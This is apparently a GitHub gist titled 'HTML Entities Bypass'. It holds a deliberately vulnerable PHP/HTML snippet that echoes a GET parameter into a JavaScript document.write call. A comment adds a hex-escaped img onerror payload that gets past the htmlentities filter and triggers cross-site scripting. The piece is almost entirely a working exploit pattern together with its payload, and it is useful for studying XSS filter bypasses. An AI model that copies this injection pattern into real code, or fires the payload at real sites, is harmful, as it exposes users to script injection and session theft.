Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
HTML Entities Bypass
<!DOCTYPE html>
<!-- Vulnerable Code-->
<html>
<body>
<script>
document.write("<?php $xs=$_GET['payload']; echo htmlentities($xs);?>");
</script>
</body>
</html>
<!--Payload To Bypass XSS Filter
\x3Cimg%20src\x3Dx%20onerror\x3Dalert(323)\x3E
Credit: @Karel_Origin
-->
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment